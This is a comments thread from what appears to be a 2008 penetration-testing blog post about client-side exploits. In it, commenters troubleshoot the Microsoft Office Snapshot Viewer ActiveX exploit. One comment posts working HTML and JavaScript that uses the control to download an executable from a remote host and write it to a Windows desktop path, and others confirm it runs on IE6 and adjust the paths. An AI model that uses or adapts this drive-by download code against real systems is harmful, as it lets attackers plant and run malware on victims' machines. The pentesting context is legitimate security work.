tag:blogger.com,1999:blog-8539880144347728238.post3693786176445444227..comments2024-01-24T04:15:08.086-05:00Comments on Carnal0wnage Blog: Leveraging Client-Side Exploits In Your PentestsUnknownnoreply@blogger.comBlogger7125tag:blogger.com,1999:blog-8539880144347728238.post-91785473571690870772008-07-24T17:12:00.000-04:002008-07-24T17:12:00.000-04:00Yep, it worked like a cham. No need to use backsla...Yep, it worked like a cham. No need to use backslashes. Not even obj.PrintSnapshot(buf1,buf2).<BR/><BR/>Here's the code I used:<BR/><A HREF="http://pstgroup.blogspot.com/2008/07/exploitmicrosoft-office-snapshot-viewer.html" REL="nofollow">Click</A>Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-1885115073429112032008-07-24T17:06:00.000-04:002008-07-24T17:06:00.000-04:00does it still work with them?does it still work with them?CGhttps://www.blogger.com/profile/11061967917509053185noreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-47124622849992973562008-07-24T16:58:00.000-04:002008-07-24T16:58:00.000-04:00Strange... I tested ph4nt0m's code (the one posted...Strange... I tested ph4nt0m's code (the one posted here) on W2K SP4 IE6 and worked just fine. No need to modify it with extra backslashes (\).Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-40611547471395331352008-07-24T16:51:00.000-04:002008-07-24T16:51:00.000-04:00is that working for you?i had to add a couple extr...is that working for you?<BR/>i had to add a couple extra /'s<BR/><BR/>so:<BR/><BR/>var buf2 = 'C:/Documents and Settings/AllUsers/Desktop/crap.exe'<BR/><BR/>turned into:<BR/>"C:\\\\Documents and Settings\\\\All Users\\\\Desktop\\\\crap.exeCGhttps://www.blogger.com/profile/11061967917509053185noreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-43197984290303410772008-07-24T16:17:00.000-04:002008-07-24T16:17:00.000-04:00lol, no dont regret it :) I figured it out, but I ...lol, no dont regret it :) I figured it out, but I had to modify the code a little bit from the original versions I saw.<BR/><BR/>This is what worked for me:<BR/><BR/>*html*<BR/>*object classid ='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'*<BR/>*/object*<BR/>*script language ='javascript'*<BR/>var buf1 = 'http://10.0.10.245/calc.exe'<BR/>var buf2 = 'C:/Documents and Settings/AllUsers/Desktop/crap.exe'<BR/>obj.SnapshotPath = buf1<BR/>obj.CompressedPath = buf2<BR/>obj.PrintSnapshot(buf1,buf2)<BR/>*/script*<BR/>*/html*<BR/><BR/>(cant use some tags, so substitute the obvious)<BR/><BR/>Apologies, I just hate NOT seeing code.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-56628285402333862502008-07-24T15:24:00.000-04:002008-07-24T15:24:00.000-04:00I'll probably regret this but...whats not working?...I'll probably regret this but...<BR/><BR/>whats not working?CGhttps://www.blogger.com/profile/11061967917509053185noreply@blogger.comtag:blogger.com,1999:blog-8539880144347728238.post-24894447651958758862008-07-24T15:03:00.000-04:002008-07-24T15:03:00.000-04:00Post your code, or it didnt happen :)(note, I cant...Post your code, or it didnt happen :)<BR/>(note, I cant get it to work the way you describe it and its giving me a headache)Anonymousnoreply@blogger.com